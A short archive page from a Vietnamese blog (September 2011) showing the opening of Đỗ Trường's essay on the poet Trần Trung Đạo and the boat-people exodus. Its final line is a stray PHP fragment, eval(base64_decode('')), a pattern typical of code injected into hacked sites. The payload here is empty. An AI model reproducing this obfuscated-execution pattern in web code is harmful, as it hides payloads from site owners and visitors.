Archive for September 23rd, 2011

Đỗ Trường: Trần Trung Đạo, tiếng vọng từ bên kia đại dương

Đỗ Trường: Trần Trung Đạo, tiếng vọng từ bên kia đại dương

Nếu không có biến cố 30-4-1975, và không có những con thuyền lá tre kia, cố lao đi để tìm sự sống thật mong manh trong cái mênh mông của biển cả, giông tố của đất trời, thì chúng ta sẽ không có một nhà thơ đa tài Trần Trung Đạo hôm na

09.23.2011 | Nhận Xét |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>